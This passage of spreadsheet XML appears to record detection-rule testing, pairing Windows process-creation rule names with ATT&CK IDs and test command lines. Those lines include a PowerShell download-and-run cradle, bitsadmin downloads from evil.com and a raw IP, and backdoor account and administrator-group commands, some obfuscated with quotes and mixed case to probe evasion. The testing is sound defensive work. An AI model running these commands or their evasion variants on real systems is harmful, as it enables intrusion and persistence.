        <v>0</v>
      </c>
    </row>
    <row r="489" ht="15.75" customHeight="1" s="42">
      <c r="A489" s="36" t="n"/>
      <c r="B489" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C489" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D489" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E489" s="43" t="inlineStr">
        <is>
          <t>net user guest /"expires:never"</t>
        </is>
      </c>
      <c r="F489" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G489" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H489" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I489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489" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K489" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="490" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A490" s="43" t="n"/>
      <c r="B490" s="36" t="n"/>
      <c r="C490" s="36" t="n"/>
      <c r="D490" s="36" t="n"/>
      <c r="E490" s="43" t="n"/>
      <c r="F490" s="43" t="n"/>
      <c r="G490" s="43" t="n"/>
      <c r="H490" s="43" t="n"/>
      <c r="I490" s="43" t="n"/>
      <c r="J490" s="43" t="n"/>
    </row>
    <row r="491" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A491" s="43" t="inlineStr">
        <is>
          <t>t1110</t>
        </is>
      </c>
      <c r="B491" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C491" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D491" s="36" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E491" s="43" t="n"/>
      <c r="F491" s="43" t="n"/>
      <c r="G491" s="43" t="n"/>
      <c r="H491" s="43" t="n"/>
      <c r="I491" s="43" t="n"/>
      <c r="J491" s="43" t="n"/>
      <c r="K491" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="492" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A492" s="43" t="n"/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</row>
    <row r="493" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A493" s="36" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B493" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_remote_desktop_group</t>
        </is>
      </c>
      <c r="C493" s="36" t="inlineStr">
        <is>
          <t>User Added to Remote Desktop Users Group</t>
        </is>
      </c>
      <c r="D493" s="36" t="inlineStr">
        <is>
          <t>ffa28e60-bdb1-46e0-9f82-05f7a61cc06e</t>
        </is>
      </c>
      <c r="E493" s="43" t="n"/>
      <c r="F493" s="43" t="n"/>
      <c r="G493" s="43" t="n"/>
      <c r="H493" s="43" t="n"/>
      <c r="I493" s="43" t="n"/>
      <c r="J493" s="43" t="n"/>
      <c r="K493" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="494" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A494" s="43" t="n"/>
      <c r="B494" s="36" t="n"/>
      <c r="C494" s="36" t="n"/>
      <c r="D494" s="36" t="n"/>
      <c r="E494" s="43" t="n"/>
      <c r="F494" s="43" t="n"/>
      <c r="G494" s="43" t="n"/>
      <c r="H494" s="43" t="n"/>
      <c r="I494" s="43" t="n"/>
      <c r="J494" s="43" t="n"/>
    </row>
    <row r="495" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A495" s="43" t="inlineStr">
        <is>
          <t>t1136.001</t>
        </is>
      </c>
      <c r="B495" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_user_add</t>
        </is>
      </c>
      <c r="C495" s="43" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE</t>
        </is>
      </c>
      <c r="D495" s="43" t="inlineStr">
        <is>
          <t>cd219ff3-fa99-45d4-8380-a7d15116c6dc</t>
        </is>
      </c>
      <c r="E495" s="43" t="n"/>
      <c r="F495" s="43" t="n"/>
      <c r="G495" s="43" t="n"/>
      <c r="H495" s="43" t="n"/>
      <c r="I495" s="43" t="n"/>
      <c r="J495" s="43" t="n"/>
      <c r="K495" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="496" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A496" s="36" t="inlineStr">
        <is>
          <t>t1136.001</t>
        </is>
      </c>
      <c r="B496" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_user_add</t>
        </is>
      </c>
      <c r="C496" s="36" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE</t>
        </is>
      </c>
      <c r="D496" s="36" t="inlineStr">
        <is>
          <t>cd219ff3-fa99-45d4-8380-a7d15116c6dc</t>
        </is>
      </c>
      <c r="E496" s="43" t="inlineStr">
        <is>
          <t>net user /add:yes "T1136.001_Admin" "T1136_pass"</t>
        </is>
      </c>
      <c r="F496" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G496" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H496" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I496" s="43" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J496" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K496" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="497" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A497" s="43" t="inlineStr">
        <is>
          <t>t1136.001</t>
        </is>
      </c>
      <c r="B497" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_user_add</t>
        </is>
      </c>
      <c r="C497" s="43" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE</t>
        </is>
      </c>
      <c r="D497" s="43" t="inlineStr">
        <is>
          <t>cd219ff3-fa99-45d4-8380-a7d15116c6dc</t>
        </is>
      </c>
      <c r="E497" s="43" t="inlineStr">
        <is>
          <t>net "user" /add "T1136.001_Admin" "T1136_pass"</t>
        </is>
      </c>
      <c r="F497" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I497" s="43" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J497" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K497" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="498" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A498" s="36" t="inlineStr">
        <is>
          <t>t1136.001</t>
        </is>
      </c>
      <c r="B498" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_user_add</t>
        </is>
      </c>
      <c r="C498" s="36" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE</t>
        </is>
      </c>
      <c r="D498" s="36" t="inlineStr">
        <is>
          <t>cd219ff3-fa99-45d4-8380-a7d15116c6dc</t>
        </is>
      </c>
      <c r="E498" s="43" t="inlineStr">
        <is>
          <t>net user "/ad""d" "T1136.001_Admin" "T1136_pass"</t>
        </is>
      </c>
      <c r="F498" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G498" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H498" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I498" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J498" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K498" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="499" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A499" s="43" t="n"/>
      <c r="B499" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_user_add_never_expire</t>
        </is>
      </c>
      <c r="C499" s="36" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE With Never Expire Option</t>
        </is>
      </c>
      <c r="D499" s="36" t="inlineStr">
        <is>
          <t>b9f0e6f5-09b4-4358-bae4-08408705bd5c</t>
        </is>
      </c>
      <c r="E499" s="43" t="n"/>
      <c r="F499" s="43" t="n"/>
      <c r="G499" s="43" t="n"/>
      <c r="H499" s="43" t="n"/>
      <c r="I499" s="43" t="n"/>
      <c r="J499" s="43" t="n"/>
      <c r="K499" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="500" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A500" s="43" t="inlineStr">
        <is>
          <t>t1136.001</t>
        </is>
      </c>
      <c r="B500" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_user_add_never_expire</t>
        </is>
      </c>
      <c r="C500" s="43" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE With Never Expire Option</t>
        </is>
      </c>
      <c r="D500" s="43" t="inlineStr">
        <is>
          <t>b9f0e6f5-09b4-4358-bae4-08408705bd5c</t>
        </is>
      </c>
      <c r="E500" s="43" t="inlineStr">
        <is>
          <t>net user /add:yes AtomicOperator$ At0micRedTeam! /expires:never</t>
        </is>
      </c>
      <c r="F500" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G500" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H500" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I500" s="43" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE With Never Expire Option (b9f0e6f5-09b4-4358-bae4-08408705bd5c); New User Created Via Net.EXE With Never Expire Option (b9f0e6f5-09b4-4358-bae4-08408705bd5c); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J500" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K500" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="501" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A501" s="43" t="n"/>
      <c r="B501" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C501" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D501" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E501" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nopRoFIle -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F501" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G501" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H501" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I501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01" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K501" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="502" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A502" s="43" t="inlineStr">
        <is>
          <t>t1136.001</t>
        </is>
      </c>
      <c r="B502" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_user_add_never_expire</t>
        </is>
      </c>
      <c r="C502" s="36" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE With Never Expire Option</t>
        </is>
      </c>
      <c r="D502" s="36" t="inlineStr">
        <is>
          <t>b9f0e6f5-09b4-4358-bae4-08408705bd5c</t>
        </is>
      </c>
      <c r="E502" s="36" t="inlineStr">
        <is>
          <t>net user /add AtomicOperator$ At0micRedTeam! /expires:"never"</t>
        </is>
      </c>
      <c r="F502" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G502" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H502" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I502" s="36" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J502" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K502" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="503" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A503" s="36" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B503" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C503" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D503" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E503" s="36" t="inlineStr">
        <is>
          <t>net localgroup "Administrators" testuser /ADD</t>
        </is>
      </c>
      <c r="F503" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G503" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H503" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I503" s="43" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J503" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K503" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="504" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A504" s="43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</row>
    <row r="505" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A505" s="36" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B505" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C505" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D505" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E505" s="36" t="inlineStr">
        <is>
          <t>net localgroup "Administrators" testuser /adD</t>
        </is>
      </c>
      <c r="F505" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G505" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H505" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I505" s="43" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J505" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K505" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="506" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A506" s="43" t="inlineStr">
        <is>
          <t>t1176.001</t>
        </is>
      </c>
      <c r="B506" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_load_extension</t>
        </is>
      </c>
      <c r="C506" s="36" t="inlineStr">
        <is>
          <t>Chromium Browser Instance Executed With Custom Extension</t>
        </is>
      </c>
      <c r="D506" s="36" t="inlineStr">
        <is>
          <t>88d6e60c-759d-4ac1-a447-c0f1466c2d21</t>
        </is>
      </c>
      <c r="E506" s="36" t="inlineStr">
        <is>
          <t>copy "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Windows\Temp\browser_host.exe" &amp;&amp; "C:\Windows\Temp\browser_host.exe" --load-extension="C:\Users\user\AppData\Local\Temp\HHe2lr"</t>
        </is>
      </c>
      <c r="F506" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G506" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H506" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I506" s="36" t="n"/>
      <c r="J506" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K506" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="507" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A507" s="43" t="n"/>
      <c r="B507" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_susp_load_extension</t>
        </is>
      </c>
      <c r="C507" s="36" t="inlineStr">
        <is>
          <t>Suspicious Chromium Browser Instance Executed With Custom Extension</t>
        </is>
      </c>
      <c r="D507" s="36" t="inlineStr">
        <is>
          <t>27ba3207-dd30-4812-abbf-5d20c57d474e</t>
        </is>
      </c>
      <c r="E507" s="36" t="n"/>
      <c r="F507" s="36" t="n"/>
      <c r="G507" s="36" t="n"/>
      <c r="H507" s="36" t="n"/>
      <c r="I507" s="36" t="n"/>
      <c r="J507" s="36" t="n"/>
      <c r="K507" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="508" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A508" s="43" t="inlineStr">
        <is>
          <t>t1176.001</t>
        </is>
      </c>
      <c r="B508" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_susp_load_extension</t>
        </is>
      </c>
      <c r="C508" s="36" t="inlineStr">
        <is>
          <t>Suspicious Chromium Browser Instance Executed With Custom Extension</t>
        </is>
      </c>
      <c r="D508" s="36" t="inlineStr">
        <is>
          <t>27ba3207-dd30-4812-abbf-5d20c57d474e</t>
        </is>
      </c>
      <c r="E508" s="36" t="inlineStr">
        <is>
          <t>"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension "C:\Users\user\AppData\Local\Temp\HHe2lr"</t>
        </is>
      </c>
      <c r="F508" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G508" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H508" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I508" s="36" t="n"/>
      <c r="J508" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K508" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="509" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A509" s="43" t="inlineStr">
        <is>
          <t>t1176.001</t>
        </is>
      </c>
      <c r="B509" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_susp_load_extension</t>
        </is>
      </c>
      <c r="C509" s="36" t="inlineStr">
        <is>
          <t>Suspicious Chromium Browser Instance Executed With Custom Extension</t>
        </is>
      </c>
      <c r="D509" s="36" t="inlineStr">
        <is>
          <t>27ba3207-dd30-4812-abbf-5d20c57d474e</t>
        </is>
      </c>
      <c r="E509" s="36" t="inlineStr">
        <is>
          <t>explorer.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\HHe2lr"</t>
        </is>
      </c>
      <c r="F509" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G509" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H509" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I509" s="36" t="n"/>
      <c r="J509" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K509" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="510" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A510" s="36" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B510" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C510" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D510" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E510" s="36" t="inlineStr">
        <is>
          <t>net localgroup "Administrators" testuser -"add"</t>
        </is>
      </c>
      <c r="F510" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G510" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H510" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I510" s="43" t="inlineStr">
        <is>
          <t>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J510" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K510" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="511" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A511" s="43" t="inlineStr">
        <is>
          <t>t1187</t>
        </is>
      </c>
      <c r="B511" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C511" s="36" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D511" s="36" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E511" s="36" t="n"/>
      <c r="F511" s="36" t="n"/>
      <c r="G511" s="36" t="n"/>
      <c r="H511" s="36" t="n"/>
      <c r="I511" s="36" t="n"/>
      <c r="J511" s="36" t="n"/>
      <c r="K511" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="512" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A512" s="36" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B512" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C512" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D512" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E512" s="36" t="inlineStr">
        <is>
          <t>net localgroup "Administrators" testuser /"add"</t>
        </is>
      </c>
      <c r="F512" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G512" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H512" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I512" s="43" t="inlineStr">
        <is>
          <t>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J512" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K512" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="513" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A513" s="36" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B513" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C513" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D513" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E513" s="36" t="inlineStr">
        <is>
          <t>net localgroup "Administrators" testuser /aDd</t>
        </is>
      </c>
      <c r="F513" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G513" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H513" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I513" s="43" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J513" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K513" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="514" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A514" s="43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</row>
    <row r="515" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A515" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B515" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download</t>
        </is>
      </c>
      <c r="C515" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin</t>
        </is>
      </c>
      <c r="D515" s="36" t="inlineStr">
        <is>
          <t>d059842b-6b9d-4ed1-b5c3-5b89143c6ede</t>
        </is>
      </c>
      <c r="E515" s="36" t="inlineStr">
        <is>
          <t>bitsadmin.exe	/transfer	myJob	http://evil.com/payload.exe	C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F515" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G515" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H515" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I515" s="36" t="n"/>
      <c r="J515" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K515" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="516" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A516" s="43" t="n"/>
      <c r="B516" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C516" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D516" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E516" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F516" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G516" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H516" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I516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516" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K516" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="517" ht="15.75" customHeight="1" s="42">
      <c r="A517" s="43" t="n"/>
      <c r="B517" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C517" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D517" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E517" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /"transfer" downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F517" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G517" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H517" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I517" s="36" t="n"/>
      <c r="J517" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K517" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="518" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A518" s="43" t="n"/>
      <c r="B518" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C518" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D518" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E518" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TRAnsFER downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F518" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G518" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H518" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I518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518" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K518" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="519" ht="15.75" customHeight="1" s="42">
      <c r="A519" s="43" t="n"/>
      <c r="B519" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C519" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D519" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E519" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F519" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G519" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H519" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I519" s="36" t="n"/>
      <c r="J519" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K519" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="520" ht="15.75" customHeight="1" s="42">
      <c r="A520" s="36" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B520" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C520" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D520" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E520" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "([ADSI]'WinNT://./Administrators,group').Add('WinNT://./testuser,user')"</t>
        </is>
      </c>
      <c r="F520" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G520" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H520" s="36" t="b">
        <v>1</v>
      </c>
